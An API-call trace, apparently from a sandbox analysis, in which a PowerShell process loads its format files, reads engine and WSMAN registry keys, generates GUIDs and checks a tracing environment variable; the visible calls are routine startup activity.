	[0604.949] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xfcae0975, Data2=0xb02b, Data3=0x452c, Data4=([0]=0xb9, [1]=0x22, [2]=0x67, [3]=0x80, [4]=0xa1, [5]=0x2f, [6]=0x9a, [7]=0x90))) returned 0x0
	[0604.949] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x40a9c57b, Data2=0x5952, Data3=0x40be, Data4=([0]=0xb1, [1]=0xb2, [2]=0x45, [3]=0xc2, [4]=0x6d, [5]=0x90, [6]=0x4b, [7]=0x6c))) returned 0x0
	[0604.950] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x3396c115, Data2=0xdf5a, Data3=0x474d, Data4=([0]=0x9a, [1]=0xc3, [2]=0x19, [3]=0x60, [4]=0x72, [5]=0xe9, [6]=0x5b, [7]=0xe4))) returned 0x0
	[0604.950] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x65c2574a, Data2=0x34e5, Data3=0x40de, Data4=([0]=0xa5, [1]=0x25, [2]=0x14, [3]=0xab, [4]=0xa2, [5]=0xfe, [6]=0xc8, [7]=0x49))) returned 0x0
	[0604.950] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x694222f6, Data2=0x72ef, Data3=0x462d, Data4=([0]=0xb4, [1]=0xc0, [2]=0xb4, [3]=0x53, [4]=0x5b, [5]=0xde, [6]=0xcc, [7]=0x52))) returned 0x0
	[0604.950] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x6564f100, Data2=0xc317, Data3=0x4aa1, Data4=([0]=0x84, [1]=0x57, [2]=0x9c, [3]=0xd7, [4]=0x6c, [5]=0x97, [6]=0x9f, [7]=0xd0))) returned 0x0
	[0604.950] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x808803e3, Data2=0x441c, Data3=0x43b8, Data4=([0]=0xae, [1]=0xbc, [2]=0xa5, [3]=0x3b, [4]=0xcb, [5]=0x88, [6]=0x40, [7]=0x6a))) returned 0x0
	[0604.950] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xeed7ee4, Data2=0xcc83, Data3=0x4ef5, Data4=([0]=0xa2, [1]=0xb9, [2]=0x72, [3]=0xcc, [4]=0x9e, [5]=0xaa, [6]=0xe9, [7]=0x63))) returned 0x0
	[0604.951] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xc01902c2, Data2=0xb1bf, Data3=0x42ff, Data4=([0]=0xa2, [1]=0xe6, [2]=0x5d, [3]=0x64, [4]=0x99, [5]=0x92, [6]=0xa9, [7]=0x1))) returned 0x0
	[0604.951] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x7513d459, Data2=0x915d, Data3=0x4d7d, Data4=([0]=0xbd, [1]=0xcf, [2]=0x5f, [3]=0x26, [4]=0xd6, [5]=0x9c, [6]=0xda, [7]=0x43))) returned 0x0
	[0604.951] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x96612cca, Data2=0xbb23, Data3=0x4929, Data4=([0]=0x90, [1]=0x4b, [2]=0x64, [3]=0xa5, [4]=0x25, [5]=0x89, [6]=0xa8, [7]=0xfa))) returned 0x0
	[0604.951] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xb260fbf4, Data2=0x2329, Data3=0x46bc, Data4=([0]=0x85, [1]=0x9a, [2]=0xe9, [3]=0x86, [4]=0x14, [5]=0x73, [6]=0xc5, [7]=0x6))) returned 0x0
	[0604.951] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x89cb3c7, Data2=0x458d, Data3=0x4a11, Data4=([0]=0x90, [1]=0x48, [2]=0x4, [3]=0x30, [4]=0xfa, [5]=0x4b, [6]=0x9f, [7]=0x60))) returned 0x0
	[0604.951] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x4100c274, Data2=0x3ab7, Data3=0x4879, Data4=([0]=0xb8, [1]=0x3f, [2]=0x4d, [3]=0x97, [4]=0xf8, [5]=0xbe, [6]=0xe5, [7]=0x77))) returned 0x0
	[0604.952] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x221abf10, Data2=0x3f22, Data3=0x4138, Data4=([0]=0x85, [1]=0x41, [2]=0xdb, [3]=0xa7, [4]=0xb7, [5]=0x74, [6]=0x8d, [7]=0x34))) returned 0x0
	[0604.952] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xeb9dae49, Data2=0xbeaf, Data3=0x4b9b, Data4=([0]=0x9c, [1]=0x50, [2]=0xa3, [3]=0x19, [4]=0x20, [5]=0x9f, [6]=0x42, [7]=0x27))) returned 0x0
	[0604.952] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x8542e80d, Data2=0x7862, Data3=0x4f24, Data4=([0]=0x99, [1]=0x15, [2]=0x52, [3]=0x8b, [4]=0x3b, [5]=0x34, [6]=0xe7, [7]=0xd4))) returned 0x0
	[0604.952] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xc0bfbbc8, Data2=0xc1e5, Data3=0x46a4, Data4=([0]=0x8e, [1]=0x8c, [2]=0x30, [3]=0xa9, [4]=0x13, [5]=0x26, [6]=0x30, [7]=0x74))) returned 0x0
	[0604.952] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x11f7f496, Data2=0x5d24, Data3=0x4435, Data4=([0]=0x9d, [1]=0xa5, [2]=0x85, [3]=0xc1, [4]=0x37, [5]=0xe8, [6]=0xd6, [7]=0xcb))) returned 0x0
	[0604.952] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x853de321, Data2=0x5269, Data3=0x4888, Data4=([0]=0x8d, [1]=0xb8, [2]=0x81, [3]=0x1, [4]=0x21, [5]=0x62, [6]=0x4b, [7]=0x91))) returned 0x0
	[0604.952] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xa1490aaa, Data2=0x2f18, Data3=0x4293, Data4=([0]=0xa5, [1]=0xb9, [2]=0x2b, [3]=0x5c, [4]=0x76, [5]=0x17, [6]=0x34, [7]=0xe3))) returned 0x0
	[0604.952] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xf0c43a8f, Data2=0x2a03, Data3=0x4a3f, Data4=([0]=0x9c, [1]=0xcf, [2]=0xd1, [3]=0x40, [4]=0x97, [5]=0x53, [6]=0x9c, [7]=0x3d))) returned 0x0
	[0604.953] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xe534d955, Data2=0x5f11, Data3=0x4c19, Data4=([0]=0xbd, [1]=0x2b, [2]=0x24, [3]=0xa5, [4]=0x9, [5]=0xc6, [6]=0xd8, [7]=0x9e))) returned 0x0
	[0604.953] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x86ff4a6b, Data2=0xfeeb, Data3=0x4d3a, Data4=([0]=0xa3, [1]=0x35, [2]=0x24, [3]=0x12, [4]=0xf, [5]=0x13, [6]=0x8b, [7]=0xea))) returned 0x0
	[0604.954] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x46f1f20d, Data2=0x892d, Data3=0x499e, Data4=([0]=0x9c, [1]=0x15, [2]=0xd2, [3]=0xc, [4]=0xa, [5]=0x20, [6]=0x9d, [7]=0xe5))) returned 0x0
	[0604.954] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x315fbfa5, Data2=0x1c7c, Data3=0x4db4, Data4=([0]=0x83, [1]=0xbc, [2]=0xb9, [3]=0xa9, [4]=0x95, [5]=0x42, [6]=0x21, [7]=0x4f))) returned 0x0
	[0604.954] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x38c0b542, Data2=0x24fa, Data3=0x47c3, Data4=([0]=0xba, [1]=0xfd, [2]=0x52, [3]=0x8a, [4]=0xee, [5]=0xb1, [6]=0xb7, [7]=0x79))) returned 0x0
	[0604.954] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x8e262775, Data2=0x5f00, Data3=0x4580, Data4=([0]=0x8a, [1]=0x5b, [2]=0x40, [3]=0x14, [4]=0xd4, [5]=0xd0, [6]=0x1f, [7]=0x32))) returned 0x0
	[0604.955] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xe50c076, Data2=0x47ae, Data3=0x41f5, Data4=([0]=0xa0, [1]=0x26, [2]=0xf1, [3]=0xa9, [4]=0x89, [5]=0x74, [6]=0x4a, [7]=0x3d))) returned 0x0
	[0604.955] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x900e9204, Data2=0x68f, Data3=0x47cc, Data4=([0]=0xa6, [1]=0x89, [2]=0x41, [3]=0x9c, [4]=0x53, [5]=0x9d, [6]=0xca, [7]=0x48))) returned 0x0
	[0604.955] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xca636ba8, Data2=0x4824, Data3=0x40da, Data4=([0]=0x81, [1]=0x12, [2]=0x30, [3]=0xbc, [4]=0x4d, [5]=0x7, [6]=0x8f, [7]=0x42))) returned 0x0
	[0604.955] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x6e2b2ec, Data2=0xa95c, Data3=0x4d64, Data4=([0]=0x8a, [1]=0x7d, [2]=0x34, [3]=0x3b, [4]=0xf6, [5]=0x8b, [6]=0xe3, [7]=0x30))) returned 0x0
	[0604.955] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x5eb12f4, Data2=0xee8a, Data3=0x4510, Data4=([0]=0x8a, [1]=0x18, [2]=0x24, [3]=0xb6, [4]=0x6e, [5]=0x8e, [6]=0x44, [7]=0x60))) returned 0x0
	[0604.955] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xd97dd572, Data2=0x82d8, Data3=0x4b1f, Data4=([0]=0xa0, [1]=0x2c, [2]=0xa8, [3]=0x42, [4]=0xbe, [5]=0x8f, [6]=0xc9, [7]=0x31))) returned 0x0
	[0604.956] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xf17a63ff, Data2=0xee65, Data3=0x493f, Data4=([0]=0x92, [1]=0x23, [2]=0xba, [3]=0xe8, [4]=0xfd, [5]=0x38, [6]=0xae, [7]=0x8c))) returned 0x0
	[0604.956] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xcd528ab0, Data2=0xc908, Data3=0x4299, Data4=([0]=0xb9, [1]=0xe9, [2]=0x4, [3]=0xd5, [4]=0xb4, [5]=0x0, [6]=0x58, [7]=0x8c))) returned 0x0
	[0604.956] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x59c4cb69, Data2=0x488d, Data3=0x474b, Data4=([0]=0xbb, [1]=0x57, [2]=0xff, [3]=0x77, [4]=0x2c, [5]=0xf8, [6]=0x2f, [7]=0x42))) returned 0x0
	[0604.956] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0xd15ca16c, Data2=0xfd5, Data3=0x4ad9, Data4=([0]=0x94, [1]=0x51, [2]=0xa0, [3]=0x16, [4]=0xb6, [5]=0xe7, [6]=0xe3, [7]=0x45))) returned 0x0
	[0604.956] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x9c5a246d, Data2=0x167c, Data3=0x40f1, Data4=([0]=0x87, [1]=0xba, [2]=0xbe, [3]=0x59, [4]=0xd0, [5]=0xe0, [6]=0x81, [7]=0xc8))) returned 0x0
	[0604.956] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0604.957] GetFileType (hFile=0x2f0) returned 0x1
	[0604.957] SetErrorMode (uMode=0x1) returned 0x1
	[0604.957] GetFileType (hFile=0x2f0) returned 0x1
	[0604.957] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f60950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f60950*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.964] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f60950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f60950*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.964] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f60950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f60950*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.965] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f60950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f60950*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.965] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f60950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f60950*, lpNumberOfBytesRead=0xccdb8*=0x8b4, lpOverlapped=0x0) returned 1
	[0604.965] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f5fd6c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f5fd6c*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0604.965] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f60950, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f60950*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0604.965] CloseHandle (hObject=0x2f0) returned 1
	[0604.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0604.965] SetErrorMode (uMode=0x1) returned 0x1
	[0604.966] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd60 | out: lpFileInformation=0xccd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0604.966] SetErrorMode (uMode=0x1) returned 0x1
	[0604.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0604.966] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce48 | out: phkResult=0xcce48*=0x2f0) returned 0x0
	[0604.966] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccdcc, lpData=0x0, lpcbData=0xccdc8*=0x0 | out: lpType=0xccdcc*=0x1, lpData=0x0, lpcbData=0xccdc8*=0x56) returned 0x0
	[0604.966] CoTaskMemAlloc (cb=0x5a) returned 0x1b3b7ea0
	[0604.966] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd9c, lpData=0x1b3b7ea0, lpcbData=0xccd98*=0x56 | out: lpType=0xccd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd98*=0x56) returned 0x0
	[0604.966] CoTaskMemFree (pv=0x1b3b7ea0) 
	[0604.967] RegCloseKey (hKey=0x2f0) returned 0x0
	[0604.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0604.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0604.967] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x832c1266, Data2=0x4c41, Data3=0x463e, Data4=([0]=0xa6, [1]=0x7b, [2]=0x15, [3]=0xe0, [4]=0x53, [5]=0x54, [6]=0x2a, [7]=0x10))) returned 0x0
	[0604.967] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x200c6f57, Data2=0x1330, Data3=0x46f1, Data4=([0]=0xaf, [1]=0xa6, [2]=0x55, [3]=0x19, [4]=0xf9, [5]=0x2, [6]=0xd4, [7]=0x73))) returned 0x0
	[0604.968] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0604.968] GetFileType (hFile=0x2f0) returned 0x1
	[0604.968] SetErrorMode (uMode=0x1) returned 0x1
	[0604.968] GetFileType (hFile=0x2f0) returned 0x1
	[0604.968] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f9e738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f9e738*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.971] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f9e738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f9e738*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.971] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f9e738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f9e738*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.974] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f9e738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f9e738*, lpNumberOfBytesRead=0xccdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0604.974] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f9e738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f9e738*, lpNumberOfBytesRead=0xccdb8*=0xe98, lpOverlapped=0x0) returned 1
	[0604.974] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f9dd38, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f9dd38*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0604.974] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f9e738, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccdb8, lpOverlapped=0x0 | out: lpBuffer=0x2f9e738*, lpNumberOfBytesRead=0xccdb8*=0x0, lpOverlapped=0x0) returned 1
	[0604.974] CloseHandle (hObject=0x2f0) returned 1
	[0604.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0604.975] SetErrorMode (uMode=0x1) returned 0x1
	[0604.975] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd60 | out: lpFileInformation=0xccd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0604.975] SetErrorMode (uMode=0x1) returned 0x1
	[0604.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0604.975] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce48 | out: phkResult=0xcce48*=0x2f0) returned 0x0
	[0604.975] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccdcc, lpData=0x0, lpcbData=0xccdc8*=0x0 | out: lpType=0xccdcc*=0x1, lpData=0x0, lpcbData=0xccdc8*=0x56) returned 0x0
	[0604.975] CoTaskMemAlloc (cb=0x5a) returned 0x1b3b7ea0
	[0604.976] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd9c, lpData=0x1b3b7ea0, lpcbData=0xccd98*=0x56 | out: lpType=0xccd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd98*=0x56) returned 0x0
	[0604.976] CoTaskMemFree (pv=0x1b3b7ea0) 
	[0604.976] RegCloseKey (hKey=0x2f0) returned 0x0
	[0604.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0604.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0604.977] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x97c70bd3, Data2=0xd597, Data3=0x43c2, Data4=([0]=0x83, [1]=0x6e, [2]=0x12, [3]=0x74, [4]=0x1b, [5]=0xab, [6]=0x82, [7]=0x72))) returned 0x0
	[0604.977] CoCreateGuid (in: pguid=0xcd070 | out: pguid=0xcd070*(Data1=0x8cd3ef1a, Data2=0xbfec, Data3=0x4932, Data4=([0]=0x83, [1]=0x6f, [2]=0xf0, [3]=0xc7, [4]=0x9e, [5]=0x54, [6]=0xb4, [7]=0x95))) returned 0x0
	[0605.001] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0605.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.001] CoTaskMemFree (pv=0x2a8780) 
	[0606.000] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0606.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.000] CoTaskMemFree (pv=0x2a8780) 
	[0606.002] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0606.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.002] CoTaskMemFree (pv=0x2a8780) 
	[0606.003] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0606.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.003] CoTaskMemFree (pv=0x2a8780) 
	[0606.015] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0606.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.015] CoTaskMemFree (pv=0x2a8780) 
	[0606.020] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0606.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.020] CoTaskMemFree (pv=0x2a8780) 
	[0606.020] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0606.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.020] CoTaskMemFree (pv=0x2a8780) 
	[0606.027] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd058 | out: phkResult=0xcd058*=0x2f0) returned 0x0
	[0606.030] RegQueryInfoKeyW (in: hKey=0x2f0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xccf5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccf58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xccf5c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccf58*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0606.030] CoTaskMemFree (pv=0x0) 
	[0606.031] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0606.031] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x0, lpValueName=0x23c760, lpcchValueName=0xcd008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0606.031] CoTaskMemFree (pv=0x23c760) 
	[0606.032] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0606.032] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x1, lpValueName=0x23c760, lpcchValueName=0xcd008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0607.049] CoTaskMemFree (pv=0x23c760) 
	[0607.049] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0607.049] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x2, lpValueName=0x23c760, lpcchValueName=0xcd008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0607.050] CoTaskMemFree (pv=0x23c760) 
